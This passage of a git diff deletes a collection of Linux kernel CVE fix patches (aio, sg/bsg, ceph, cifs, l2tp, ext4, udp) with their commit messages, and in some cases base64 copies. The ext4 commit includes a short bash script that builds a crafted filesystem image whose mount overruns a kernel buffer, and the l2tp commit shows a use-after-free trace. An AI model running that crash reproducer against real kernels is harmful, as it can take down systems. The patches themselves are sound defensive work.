-ZGlmZiAtLWdpdCBhL2ZzL2Fpby5jIGIvZnMvYWlvLmMKaW5kZXggZDk5MTI1NS4uM2VlYzk4NCAxMDA2NDQKLS0tIGEvZnMvYWlvLmMKKysrIGIvZnMvYWlvLmMKQEAgLTIyOSw2ICsyMjksNyBAQAogCWFpb19tbnQgPSBrZXJuX21vdW50KCZhaW9fZnMpOwogCWlmIChJU19FUlIoYWlvX21udCkpCiAJCXBhbmljKCJGYWlsZWQgdG8gY3JlYXRlIGFpbyBmcyBtb3VudC4iKTsKKwlhaW9fbW50LT5tbnRfZmxhZ3MgfD0gTU5UX05PRVhFQzsKIAogCWlmIChiZGlfaW5pdCgmYWlvX2ZzX2JhY2tpbmdfZGV2X2luZm8pKQogCQlwYW5pYygiRmFpbGVkIHRvIGluaXQgYWlvIGZzIGJhY2tpbmcgZGV2IGluZm8uIik7Cg==
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2016-10044/ANY/0003.patch b/Patches/Linux_CVEs/CVE-2016-10044/ANY/0003.patch
deleted file mode 100644
index ea964df1..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10044/ANY/0003.patch
+++ /dev/null
@@ -1,22 +0,0 @@
-diff --git a/fs/aio.c b/fs/aio.c
-index 9798d4e..0f2c38f 100644
---- a/fs/aio.c
-+++ b/fs/aio.c
-@@ -35,6 +35,7 @@
- #include <linux/eventfd.h>
- #include <linux/blkdev.h>
- #include <linux/compat.h>
-+#include <linux/personality.h>
- 
- #include <asm/kmap_types.h>
- #include <asm/uaccess.h>
-@@ -153,6 +154,9 @@
- 	unsigned long size, populate;
- 	int nr_pages;
- 
-+	if (current->personality & READ_IMPLIES_EXEC)
-+		return -EPERM;
-+
- 	/* Compensate for the ring buffer's head/tail overlap entry */
- 	nr_events += 2;	/* 1 is required, 2 for good luck */
- 
diff --git a/Patches/Linux_CVEs/CVE-2016-10044/ANY/0003.patch.base64 b/Patches/Linux_CVEs/CVE-2016-10044/ANY/0003.patch.base64
deleted file mode 100644
index b74cf0b4..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10044/ANY/0003.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-ZGlmZiAtLWdpdCBhL2ZzL2Fpby5jIGIvZnMvYWlvLmMKaW5kZXggOTc5OGQ0ZS4uMGYyYzM4ZiAxMDA2NDQKLS0tIGEvZnMvYWlvLmMKKysrIGIvZnMvYWlvLmMKQEAgLTM1LDYgKzM1LDcgQEAKICNpbmNsdWRlIDxsaW51eC9ldmVudGZkLmg+CiAjaW5jbHVkZSA8bGludXgvYmxrZGV2Lmg+CiAjaW5jbHVkZSA8bGludXgvY29tcGF0Lmg+CisjaW5jbHVkZSA8bGludXgvcGVyc29uYWxpdHkuaD4KIAogI2luY2x1ZGUgPGFzbS9rbWFwX3R5cGVzLmg+CiAjaW5jbHVkZSA8YXNtL3VhY2Nlc3MuaD4KQEAgLTE1Myw2ICsxNTQsOSBAQAogCXVuc2lnbmVkIGxvbmcgc2l6ZSwgcG9wdWxhdGU7CiAJaW50IG5yX3BhZ2VzOwogCisJaWYgKGN1cnJlbnQtPnBlcnNvbmFsaXR5ICYgUkVBRF9JTVBMSUVTX0VYRUMpCisJCXJldHVybiAtRVBFUk07CisKIAkvKiBDb21wZW5zYXRlIGZvciB0aGUgcmluZyBidWZmZXIncyBoZWFkL3RhaWwgb3ZlcmxhcCBlbnRyeSAqLwogCW5yX2V2ZW50cyArPSAyOwkvKiAxIGlzIHJlcXVpcmVkLCAyIGZvciBnb29kIGx1Y2sgKi8KIAo=
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2016-10088/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-10088/ANY/0001.patch
deleted file mode 100644
index 695b415d..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10088/ANY/0001.patch
+++ /dev/null
@@ -1,48 +0,0 @@
-From 128394eff343fc6d2f32172f03e24829539c5835 Mon Sep 17 00:00:00 2001
-From: Al Viro <viro@zeniv.linux.org.uk>
-Date: Fri, 16 Dec 2016 13:42:06 -0500
-Subject: sg_write()/bsg_write() is not fit to be called under KERNEL_DS
-
-Both damn things interpret userland pointers embedded into the payload;
-worse, they are actually traversing those.  Leaving aside the bad
-API design, this is very much _not_ safe to call with KERNEL_DS.
-Bail out early if that happens.
-
-Cc: stable@vger.kernel.org
-Signed-off-by: Al Viro <viro@zeniv.linux.org.uk>
----
- block/bsg.c       | 3 +++
- drivers/scsi/sg.c | 3 +++
- 2 files changed, 6 insertions(+)
-
-diff --git a/block/bsg.c b/block/bsg.c
-index 8a05a40..a57046d 100644
---- a/block/bsg.c
-+++ b/block/bsg.c
-@@ -655,6 +655,9 @@ bsg_write(struct file *file, const char __user *buf, size_t count, loff_t *ppos)
- 
- 	dprintk("%s: write %Zd bytes\n", bd->name, count);
- 
-+	if (unlikely(segment_eq(get_fs(), KERNEL_DS)))
-+		return -EINVAL;
-+
- 	bsg_set_block(bd, file);
- 
- 	bytes_written = 0;
-diff --git a/drivers/scsi/sg.c b/drivers/scsi/sg.c
-index 070332e..dbe5b4b 100644
---- a/drivers/scsi/sg.c
-+++ b/drivers/scsi/sg.c
-@@ -581,6 +581,9 @@ sg_write(struct file *filp, const char __user *buf, size_t count, loff_t * ppos)
- 	sg_io_hdr_t *hp;
- 	unsigned char cmnd[SG_MAX_CDB_SIZE];
- 
-+	if (unlikely(segment_eq(get_fs(), KERNEL_DS)))
-+		return -EINVAL;
-+
- 	if ((!(sfp = (Sg_fd *) filp->private_data)) || (!(sdp = sfp->parentdp)))
- 		return -ENXIO;
- 	SCSI_LOG_TIMEOUT(3, sg_printk(KERN_INFO, sdp,
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10153/4.9/0001.patch b/Patches/Linux_CVEs/CVE-2016-10153/4.9/0001.patch
deleted file mode 100644
index ee3c5296..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10153/4.9/0001.patch
+++ /dev/null
@@ -1,144 +0,0 @@
-From a45f795c65b479b4ba107b6ccde29b896d51ee98 Mon Sep 17 00:00:00 2001
-From: Ilya Dryomov <idryomov@gmail.com>
-Date: Fri, 2 Dec 2016 16:35:07 +0100
-Subject: libceph: introduce ceph_crypt() for in-place en/decryption
-
-Starting with 4.9, kernel stacks may be vmalloced and therefore not
-guaranteed to be physically contiguous; the new CONFIG_VMAP_STACK
-option is enabled by default on x86.  This makes it invalid to use
-on-stack buffers with the crypto scatterlist API, as sg_set_buf()
-expects a logical address and won't work with vmalloced addresses.
-
-There isn't a different (e.g. kvec-based) crypto API we could switch
-net/ceph/crypto.c to and the current scatterlist.h API isn't getting
-updated to accommodate this use case.  Allocating a new header and
-padding for each operation is a non-starter, so do the en/decryption
-in-place on a single pre-assembled (header + data + padding) heap
-buffer.  This is explicitly supported by the crypto API:
-
-    "... the caller may provide the same scatter/gather list for the
-     plaintext and cipher text. After the completion of the cipher
-     operation, the plaintext data is replaced with the ciphertext data
-     in case of an encryption and vice versa for a decryption."
-
-Signed-off-by: Ilya Dryomov <idryomov@gmail.com>
-Reviewed-by: Sage Weil <sage@redhat.com>
----
- net/ceph/crypto.c | 87 +++++++++++++++++++++++++++++++++++++++++++++++++++++++
- net/ceph/crypto.h |  2 ++
- 2 files changed, 89 insertions(+)
-
-diff --git a/net/ceph/crypto.c b/net/ceph/crypto.c
-index db2847a..32099c5 100644
---- a/net/ceph/crypto.c
-+++ b/net/ceph/crypto.c
-@@ -526,6 +526,93 @@ int ceph_encrypt2(struct ceph_crypto_key *secret, void *dst, size_t *dst_len,
- 	}
- }
- 
-+static int ceph_aes_crypt(const struct ceph_crypto_key *key, bool encrypt,
-+			  void *buf, int buf_len, int in_len, int *pout_len)
-+{
-+	struct crypto_skcipher *tfm = ceph_crypto_alloc_cipher();
-+	SKCIPHER_REQUEST_ON_STACK(req, tfm);
-+	struct sg_table sgt;
-+	struct scatterlist prealloc_sg;
-+	char iv[AES_BLOCK_SIZE];
-+	int pad_byte = AES_BLOCK_SIZE - (in_len & (AES_BLOCK_SIZE - 1));
-+	int crypt_len = encrypt ? in_len + pad_byte : in_len;
-+	int ret;
-+
-+	if (IS_ERR(tfm))
-+		return PTR_ERR(tfm);
-+
-+	WARN_ON(crypt_len > buf_len);
-+	if (encrypt)
-+		memset(buf + in_len, pad_byte, pad_byte);
-+	ret = setup_sgtable(&sgt, &prealloc_sg, buf, crypt_len);
-+	if (ret)
-+		goto out_tfm;
-+
-+	crypto_skcipher_setkey((void *)tfm, key->key, key->len);
-+	memcpy(iv, aes_iv, AES_BLOCK_SIZE);
-+
-+	skcipher_request_set_tfm(req, tfm);
-+	skcipher_request_set_callback(req, 0, NULL, NULL);
-+	skcipher_request_set_crypt(req, sgt.sgl, sgt.sgl, crypt_len, iv);
-+
-+	/*
-+	print_hex_dump(KERN_ERR, "key: ", DUMP_PREFIX_NONE, 16, 1,
-+		       key->key, key->len, 1);
-+	print_hex_dump(KERN_ERR, " in: ", DUMP_PREFIX_NONE, 16, 1,
-+		       buf, crypt_len, 1);
-+	*/
-+	if (encrypt)
-+		ret = crypto_skcipher_encrypt(req);
-+	else
-+		ret = crypto_skcipher_decrypt(req);
-+	skcipher_request_zero(req);
-+	if (ret) {
-+		pr_err("%s %scrypt failed: %d\n", __func__,
-+		       encrypt ? "en" : "de", ret);
-+		goto out_sgt;
-+	}
-+	/*
-+	print_hex_dump(KERN_ERR, "out: ", DUMP_PREFIX_NONE, 16, 1,
-+		       buf, crypt_len, 1);
-+	*/
-+
-+	if (encrypt) {
-+		*pout_len = crypt_len;
-+	} else {
-+		pad_byte = *(char *)(buf + in_len - 1);
-+		if (pad_byte > 0 && pad_byte <= AES_BLOCK_SIZE &&
-+		    in_len >= pad_byte) {
-+			*pout_len = in_len - pad_byte;
-+		} else {
-+			pr_err("%s got bad padding %d on in_len %d\n",
-+			       __func__, pad_byte, in_len);
-+			ret = -EPERM;
-+			goto out_sgt;
-+		}
-+	}
-+
-+out_sgt:
-+	teardown_sgtable(&sgt);
-+out_tfm:
-+	crypto_free_skcipher(tfm);
-+	return ret;
-+}
-+
-+int ceph_crypt(const struct ceph_crypto_key *key, bool encrypt,
-+	       void *buf, int buf_len, int in_len, int *pout_len)
-+{
-+	switch (key->type) {
-+	case CEPH_CRYPTO_NONE:
-+		*pout_len = in_len;
-+		return 0;
-+	case CEPH_CRYPTO_AES:
-+		return ceph_aes_crypt(key, encrypt, buf, buf_len, in_len,
-+				      pout_len);
-+	default:
-+		return -ENOTSUPP;
-+	}
-+}
-+
- static int ceph_key_preparse(struct key_preparsed_payload *prep)
- {
- 	struct ceph_crypto_key *ckey;
-diff --git a/net/ceph/crypto.h b/net/ceph/crypto.h
-index 2e9cab0..73da34e 100644
---- a/net/ceph/crypto.h
-+++ b/net/ceph/crypto.h
-@@ -43,6 +43,8 @@ int ceph_encrypt2(struct ceph_crypto_key *secret,
- 		  void *dst, size_t *dst_len,
- 		  const void *src1, size_t src1_len,
- 		  const void *src2, size_t src2_len);
-+int ceph_crypt(const struct ceph_crypto_key *key, bool encrypt,
-+	       void *buf, int buf_len, int in_len, int *pout_len);
- int ceph_crypto_init(void);
- void ceph_crypto_shutdown(void);
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10154/4.9/0001.patch b/Patches/Linux_CVEs/CVE-2016-10154/4.9/0001.patch
deleted file mode 100644
index 084f55e0..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10154/4.9/0001.patch
+++ /dev/null
@@ -1,93 +0,0 @@
-From 06deeec77a5a689cc94b21a8a91a76e42176685d Mon Sep 17 00:00:00 2001
-From: Andy Lutomirski <luto@kernel.org>
-Date: Mon, 12 Dec 2016 12:54:37 -0800
-Subject: cifs: Fix smbencrypt() to stop pointing a scatterlist at the stack
-
-smbencrypt() points a scatterlist to the stack, which is breaks if
-CONFIG_VMAP_STACK=y.
-
-Fix it by switching to crypto_cipher_encrypt_one().  The new code
-should be considerably faster as an added benefit.
-
-This code is nearly identical to some code that Eric Biggers
-suggested.
-
-Cc: stable@vger.kernel.org # 4.9 only
-Reported-by: Eric Biggers <ebiggers3@gmail.com>
-Signed-off-by: Andy Lutomirski <luto@kernel.org>
-Acked-by: Jeff Layton <jlayton@redhat.com>
-Signed-off-by: Steve French <smfrench@gmail.com>
----
- fs/cifs/smbencrypt.c | 40 ++++++++--------------------------------
- 1 file changed, 8 insertions(+), 32 deletions(-)
-
-diff --git a/fs/cifs/smbencrypt.c b/fs/cifs/smbencrypt.c
-index 699b786..c12bffe 100644
---- a/fs/cifs/smbencrypt.c
-+++ b/fs/cifs/smbencrypt.c
-@@ -23,7 +23,7 @@
-    Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
- */
- 
--#include <crypto/skcipher.h>
-+#include <linux/crypto.h>
- #include <linux/module.h>
- #include <linux/slab.h>
- #include <linux/fs.h>
-@@ -69,46 +69,22 @@ str_to_key(unsigned char *str, unsigned char *key)
- static int
- smbhash(unsigned char *out, const unsigned char *in, unsigned char *key)
- {
--	int rc;
- 	unsigned char key2[8];
--	struct crypto_skcipher *tfm_des;
--	struct scatterlist sgin, sgout;
--	struct skcipher_request *req;
-+	struct crypto_cipher *tfm_des;
- 
- 	str_to_key(key, key2);
- 
--	tfm_des = crypto_alloc_skcipher("ecb(des)", 0, CRYPTO_ALG_ASYNC);
-+	tfm_des = crypto_alloc_cipher("des", 0, 0);
- 	if (IS_ERR(tfm_des)) {
--		rc = PTR_ERR(tfm_des);
--		cifs_dbg(VFS, "could not allocate des crypto API\n");
--		goto smbhash_err;
--	}
--
--	req = skcipher_request_alloc(tfm_des, GFP_KERNEL);
--	if (!req) {
--		rc = -ENOMEM;
- 		cifs_dbg(VFS, "could not allocate des crypto API\n");
--		goto smbhash_free_skcipher;
-+		return PTR_ERR(tfm_des);
- 	}
- 
--	crypto_skcipher_setkey(tfm_des, key2, 8);
--
--	sg_init_one(&sgin, in, 8);
--	sg_init_one(&sgout, out, 8);
-+	crypto_cipher_setkey(tfm_des, key2, 8);
-+	crypto_cipher_encrypt_one(tfm_des, out, in);
-+	crypto_free_cipher(tfm_des);
- 
--	skcipher_request_set_callback(req, 0, NULL, NULL);
--	skcipher_request_set_crypt(req, &sgin, &sgout, 8, NULL);
--
--	rc = crypto_skcipher_encrypt(req);
--	if (rc)
--		cifs_dbg(VFS, "could not encrypt crypt key rc: %d\n", rc);
--
--	skcipher_request_free(req);
--
--smbhash_free_skcipher:
--	crypto_free_skcipher(tfm_des);
--smbhash_err:
--	return rc;
-+	return 0;
- }
- 
- static int
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10200/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-10200/ANY/0001.patch
deleted file mode 100644
index 6ed7d488..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10200/ANY/0001.patch
+++ /dev/null
@@ -1,167 +0,0 @@
-From 32c231164b762dddefa13af5a0101032c70b50ef Mon Sep 17 00:00:00 2001
-From: Guillaume Nault <g.nault@alphalink.fr>
-Date: Fri, 18 Nov 2016 22:13:00 +0100
-Subject: l2tp: fix racy SOCK_ZAPPED flag check in l2tp_ip{,6}_bind()
-
-Lock socket before checking the SOCK_ZAPPED flag in l2tp_ip6_bind().
-Without lock, a concurrent call could modify the socket flags between
-the sock_flag(sk, SOCK_ZAPPED) test and the lock_sock() call. This way,
-a socket could be inserted twice in l2tp_ip6_bind_table. Releasing it
-would then leave a stale pointer there, generating use-after-free
-errors when walking through the list or modifying adjacent entries.
-
-BUG: KASAN: use-after-free in l2tp_ip6_close+0x22e/0x290 at addr ffff8800081b0ed8
-Write of size 8 by task syz-executor/10987
-CPU: 0 PID: 10987 Comm: syz-executor Not tainted 4.8.0+ #39
-Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014
- ffff880031d97838 ffffffff829f835b ffff88001b5a1640 ffff8800081b0ec0
- ffff8800081b15a0 ffff8800081b6d20 ffff880031d97860 ffffffff8174d3cc
- ffff880031d978f0 ffff8800081b0e80 ffff88001b5a1640 ffff880031d978e0
-Call Trace:
- [<ffffffff829f835b>] dump_stack+0xb3/0x118 lib/dump_stack.c:15
- [<ffffffff8174d3cc>] kasan_object_err+0x1c/0x70 mm/kasan/report.c:156
- [<     inline     >] print_address_description mm/kasan/report.c:194
- [<ffffffff8174d666>] kasan_report_error+0x1f6/0x4d0 mm/kasan/report.c:283
- [<     inline     >] kasan_report mm/kasan/report.c:303
- [<ffffffff8174db7e>] __asan_report_store8_noabort+0x3e/0x40 mm/kasan/report.c:329
- [<     inline     >] __write_once_size ./include/linux/compiler.h:249
- [<     inline     >] __hlist_del ./include/linux/list.h:622
- [<     inline     >] hlist_del_init ./include/linux/list.h:637
- [<ffffffff8579047e>] l2tp_ip6_close+0x22e/0x290 net/l2tp/l2tp_ip6.c:239
- [<ffffffff850b2dfd>] inet_release+0xed/0x1c0 net/ipv4/af_inet.c:415
- [<ffffffff851dc5a0>] inet6_release+0x50/0x70 net/ipv6/af_inet6.c:422
- [<ffffffff84c4581d>] sock_release+0x8d/0x1d0 net/socket.c:570
- [<ffffffff84c45976>] sock_close+0x16/0x20 net/socket.c:1017
- [<ffffffff817a108c>] __fput+0x28c/0x780 fs/file_table.c:208
- [<ffffffff817a1605>] ____fput+0x15/0x20 fs/file_table.c:244
- [<ffffffff813774f9>] task_work_run+0xf9/0x170
- [<ffffffff81324aae>] do_exit+0x85e/0x2a00
- [<ffffffff81326dc8>] do_group_exit+0x108/0x330
- [<ffffffff81348cf7>] get_signal+0x617/0x17a0 kernel/signal.c:2307
- [<ffffffff811b49af>] do_signal+0x7f/0x18f0
- [<ffffffff810039bf>] exit_to_usermode_loop+0xbf/0x150 arch/x86/entry/common.c:156
- [<     inline     >] prepare_exit_to_usermode arch/x86/entry/common.c:190
- [<ffffffff81006060>] syscall_return_slowpath+0x1a0/0x1e0 arch/x86/entry/common.c:259
- [<ffffffff85e4d726>] entry_SYSCALL_64_fastpath+0xc4/0xc6
-Object at ffff8800081b0ec0, in cache L2TP/IPv6 size: 1448
-Allocated:
-PID = 10987
- [ 1116.897025] [<ffffffff811ddcb6>] save_stack_trace+0x16/0x20
- [ 1116.897025] [<ffffffff8174c736>] save_stack+0x46/0xd0
- [ 1116.897025] [<ffffffff8174c9ad>] kasan_kmalloc+0xad/0xe0
- [ 1116.897025] [<ffffffff8174cee2>] kasan_slab_alloc+0x12/0x20
- [ 1116.897025] [<     inline     >] slab_post_alloc_hook mm/slab.h:417
- [ 1116.897025] [<     inline     >] slab_alloc_node mm/slub.c:2708
- [ 1116.897025] [<     inline     >] slab_alloc mm/slub.c:2716
- [ 1116.897025] [<ffffffff817476a8>] kmem_cache_alloc+0xc8/0x2b0 mm/slub.c:2721
- [ 1116.897025] [<ffffffff84c4f6a9>] sk_prot_alloc+0x69/0x2b0 net/core/sock.c:1326
- [ 1116.897025] [<ffffffff84c58ac8>] sk_alloc+0x38/0xae0 net/core/sock.c:1388
- [ 1116.897025] [<ffffffff851ddf67>] inet6_create+0x2d7/0x1000 net/ipv6/af_inet6.c:182
- [ 1116.897025] [<ffffffff84c4af7b>] __sock_create+0x37b/0x640 net/socket.c:1153
- [ 1116.897025] [<     inline     >] sock_create net/socket.c:1193
- [ 1116.897025] [<     inline     >] SYSC_socket net/socket.c:1223
- [ 1116.897025] [<ffffffff84c4b46f>] SyS_socket+0xef/0x1b0 net/socket.c:1203
- [ 1116.897025] [<ffffffff85e4d685>] entry_SYSCALL_64_fastpath+0x23/0xc6
-Freed:
-PID = 10987
- [ 1116.897025] [<ffffffff811ddcb6>] save_stack_trace+0x16/0x20
- [ 1116.897025] [<ffffffff8174c736>] save_stack+0x46/0xd0
- [ 1116.897025] [<ffffffff8174cf61>] kasan_slab_free+0x71/0xb0
- [ 1116.897025] [<     inline     >] slab_free_hook mm/slub.c:1352
- [ 1116.897025] [<     inline     >] slab_free_freelist_hook mm/slub.c:1374
- [ 1116.897025] [<     inline     >] slab_free mm/slub.c:2951
- [ 1116.897025] [<ffffffff81748b28>] kmem_cache_free+0xc8/0x330 mm/slub.c:2973
- [ 1116.897025] [<     inline     >] sk_prot_free net/core/sock.c:1369
- [ 1116.897025] [<ffffffff84c541eb>] __sk_destruct+0x32b/0x4f0 net/core/sock.c:1444
- [ 1116.897025] [<ffffffff84c5aca4>] sk_destruct+0x44/0x80 net/core/sock.c:1452
- [ 1116.897025] [<ffffffff84c5ad33>] __sk_free+0x53/0x220 net/core/sock.c:1460
- [ 1116.897025] [<ffffffff84c5af23>] sk_free+0x23/0x30 net/core/sock.c:1471
- [ 1116.897025] [<ffffffff84c5cb6c>] sk_common_release+0x28c/0x3e0 ./include/net/sock.h:1589
- [ 1116.897025] [<ffffffff8579044e>] l2tp_ip6_close+0x1fe/0x290 net/l2tp/l2tp_ip6.c:243
- [ 1116.897025] [<ffffffff850b2dfd>] inet_release+0xed/0x1c0 net/ipv4/af_inet.c:415
- [ 1116.897025] [<ffffffff851dc5a0>] inet6_release+0x50/0x70 net/ipv6/af_inet6.c:422
- [ 1116.897025] [<ffffffff84c4581d>] sock_release+0x8d/0x1d0 net/socket.c:570
- [ 1116.897025] [<ffffffff84c45976>] sock_close+0x16/0x20 net/socket.c:1017
- [ 1116.897025] [<ffffffff817a108c>] __fput+0x28c/0x780 fs/file_table.c:208
- [ 1116.897025] [<ffffffff817a1605>] ____fput+0x15/0x20 fs/file_table.c:244
- [ 1116.897025] [<ffffffff813774f9>] task_work_run+0xf9/0x170
- [ 1116.897025] [<ffffffff81324aae>] do_exit+0x85e/0x2a00
- [ 1116.897025] [<ffffffff81326dc8>] do_group_exit+0x108/0x330
- [ 1116.897025] [<ffffffff81348cf7>] get_signal+0x617/0x17a0 kernel/signal.c:2307
- [ 1116.897025] [<ffffffff811b49af>] do_signal+0x7f/0x18f0
- [ 1116.897025] [<ffffffff810039bf>] exit_to_usermode_loop+0xbf/0x150 arch/x86/entry/common.c:156
- [ 1116.897025] [<     inline     >] prepare_exit_to_usermode arch/x86/entry/common.c:190
- [ 1116.897025] [<ffffffff81006060>] syscall_return_slowpath+0x1a0/0x1e0 arch/x86/entry/common.c:259
- [ 1116.897025] [<ffffffff85e4d726>] entry_SYSCALL_64_fastpath+0xc4/0xc6
-Memory state around the buggy address:
- ffff8800081b0d80: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
- ffff8800081b0e00: fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc fc
->ffff8800081b0e80: fc fc fc fc fc fc fc fc fb fb fb fb fb fb fb fb
-                                                    ^
- ffff8800081b0f00: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
- ffff8800081b0f80: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
-
-==================================================================
-
-The same issue exists with l2tp_ip_bind() and l2tp_ip_bind_table.
-
-Fixes: c51ce49735c1 ("l2tp: fix oops in L2TP IP sockets for connect() AF_UNSPEC case")
-Reported-by: Baozeng Ding <sploving1@gmail.com>
-Reported-by: Andrey Konovalov <andreyknvl@google.com>
-Tested-by: Baozeng Ding <sploving1@gmail.com>
-Signed-off-by: Guillaume Nault <g.nault@alphalink.fr>
-Signed-off-by: David S. Miller <davem@davemloft.net>
----
- net/l2tp/l2tp_ip.c  | 5 +++--
- net/l2tp/l2tp_ip6.c | 5 +++--
- 2 files changed, 6 insertions(+), 4 deletions(-)
-
-diff --git a/net/l2tp/l2tp_ip.c b/net/l2tp/l2tp_ip.c
-index fce25af..982f6c4 100644
---- a/net/l2tp/l2tp_ip.c
-+++ b/net/l2tp/l2tp_ip.c
-@@ -251,8 +251,6 @@ static int l2tp_ip_bind(struct sock *sk, struct sockaddr *uaddr, int addr_len)
- 	int ret;
- 	int chk_addr_ret;
- 
--	if (!sock_flag(sk, SOCK_ZAPPED))
--		return -EINVAL;
- 	if (addr_len < sizeof(struct sockaddr_l2tpip))
- 		return -EINVAL;
- 	if (addr->l2tp_family != AF_INET)
-@@ -267,6 +265,9 @@ static int l2tp_ip_bind(struct sock *sk, struct sockaddr *uaddr, int addr_len)
- 	read_unlock_bh(&l2tp_ip_lock);
- 
- 	lock_sock(sk);
-+	if (!sock_flag(sk, SOCK_ZAPPED))
-+		goto out;
-+
- 	if (sk->sk_state != TCP_CLOSE || addr_len < sizeof(struct sockaddr_l2tpip))
- 		goto out;
- 
-diff --git a/net/l2tp/l2tp_ip6.c b/net/l2tp/l2tp_ip6.c
-index ad3468c..9978d01 100644
---- a/net/l2tp/l2tp_ip6.c
-+++ b/net/l2tp/l2tp_ip6.c
-@@ -269,8 +269,6 @@ static int l2tp_ip6_bind(struct sock *sk, struct sockaddr *uaddr, int addr_len)
- 	int addr_type;
- 	int err;
- 
--	if (!sock_flag(sk, SOCK_ZAPPED))
--		return -EINVAL;
- 	if (addr->l2tp_family != AF_INET6)
- 		return -EINVAL;
- 	if (addr_len < sizeof(*addr))
-@@ -296,6 +294,9 @@ static int l2tp_ip6_bind(struct sock *sk, struct sockaddr *uaddr, int addr_len)
- 	lock_sock(sk);
- 
- 	err = -EINVAL;
-+	if (!sock_flag(sk, SOCK_ZAPPED))
-+		goto out_unlock;
-+
- 	if (sk->sk_state != TCP_CLOSE)
- 		goto out_unlock;
- 
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10208/3.10-^3.16/0001.patch b/Patches/Linux_CVEs/CVE-2016-10208/3.10-^3.16/0001.patch
deleted file mode 100644
index a8320eed..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10208/3.10-^3.16/0001.patch
+++ /dev/null
@@ -1,71 +0,0 @@
-From cde863587b6809fdf61ea3c5391ecf06884b5516 Mon Sep 17 00:00:00 2001
-From: Eryu Guan <guaneryu@gmail.com>
-Date: Thu, 1 Dec 2016 15:08:37 -0500
-Subject: ext4: validate s_first_meta_bg at mount time
-
-commit 3a4b77cd47bb837b8557595ec7425f281f2ca1fe upstream.
-
-Ralf Spenneberg reported that he hit a kernel crash when mounting a
-modified ext4 image. And it turns out that kernel crashed when
-calculating fs overhead (ext4_calculate_overhead()), this is because
-the image has very large s_first_meta_bg (debug code shows it's
-842150400), and ext4 overruns the memory in count_overhead() when
-setting bitmap buffer, which is PAGE_SIZE.
-
-ext4_calculate_overhead():
-  buf = get_zeroed_page(GFP_NOFS);  <=== PAGE_SIZE buffer
-  blks = count_overhead(sb, i, buf);
-
-count_overhead():
-  for (j = ext4_bg_num_gdb(sb, grp); j > 0; j--) { <=== j = 842150400
-          ext4_set_bit(EXT4_B2C(sbi, s++), buf);   <=== buffer overrun
-          count++;
-  }
-
-This can be reproduced easily for me by this script:
-
-  #!/bin/bash
-  rm -f fs.img
-  mkdir -p /mnt/ext4
-  fallocate -l 16M fs.img
-  mke2fs -t ext4 -O bigalloc,meta_bg,^resize_inode -F fs.img
-  debugfs -w -R "ssv first_meta_bg 842150400" fs.img
-  mount -o loop fs.img /mnt/ext4
-
-Fix it by validating s_first_meta_bg first at mount time, and
-refusing to mount if its value exceeds the largest possible meta_bg
-number.
-
-Reported-by: Ralf Spenneberg <ralf@os-t.de>
-Signed-off-by: Eryu Guan <guaneryu@gmail.com>
-Signed-off-by: Theodore Ts'o <tytso@mit.edu>
-Reviewed-by: Andreas Dilger <adilger@dilger.ca>
-[bwh: Backported to 3.16: use EXT4_HAS_INCOMPAT_FEATURE()]
-Signed-off-by: Ben Hutchings <ben@decadent.org.uk>
----
- fs/ext4/super.c | 9 +++++++++
- 1 file changed, 9 insertions(+)
-
-diff --git a/fs/ext4/super.c b/fs/ext4/super.c
-index a1fed66..13a33c3 100644
---- a/fs/ext4/super.c
-+++ b/fs/ext4/super.c
-@@ -3905,6 +3905,15 @@ static int ext4_fill_super(struct super_block *sb, void *data, int silent)
- 			(EXT4_MAX_BLOCK_FILE_PHYS / EXT4_BLOCKS_PER_GROUP(sb)));
- 	db_count = (sbi->s_groups_count + EXT4_DESC_PER_BLOCK(sb) - 1) /
- 		   EXT4_DESC_PER_BLOCK(sb);
-+	if (EXT4_HAS_INCOMPAT_FEATURE(sb,EXT4_FEATURE_INCOMPAT_META_BG)) {
-+		if (le32_to_cpu(es->s_first_meta_bg) >= db_count) {
-+			ext4_msg(sb, KERN_WARNING,
-+				 "first meta block group too large: %u "
-+				 "(group descriptor block count %u)",
-+				 le32_to_cpu(es->s_first_meta_bg), db_count);
-+			goto failed_mount;
-+		}
-+	}
- 	sbi->s_group_desc = ext4_kvmalloc(db_count *
- 					  sizeof(struct buffer_head *),
- 					  GFP_KERNEL);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-10229/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-10229/ANY/0001.patch
deleted file mode 100644
index 1d12eaa4..00000000
--- a/Patches/Linux_CVEs/CVE-2016-10229/ANY/0001.patch
+++ /dev/null
@@ -1,94 +0,0 @@
-From 197c949e7798fbf28cfadc69d9ca0c2abbf93191 Mon Sep 17 00:00:00 2001
-From: Eric Dumazet <edumazet@google.com>
-Date: Wed, 30 Dec 2015 08:51:12 -0500
-Subject: udp: properly support MSG_PEEK with truncated buffers
-
-Backport of this upstream commit into stable kernels :
-89c22d8c3b27 ("net: Fix skb csum races when peeking")
-exposed a bug in udp stack vs MSG_PEEK support, when user provides
-a buffer smaller than skb payload.
-
-In this case,
-skb_copy_and_csum_datagram_iovec(skb, sizeof(struct udphdr),
-                                 msg->msg_iov);
-returns -EFAULT.
-
-This bug does not happen in upstream kernels since Al Viro did a great
-job to replace this into :
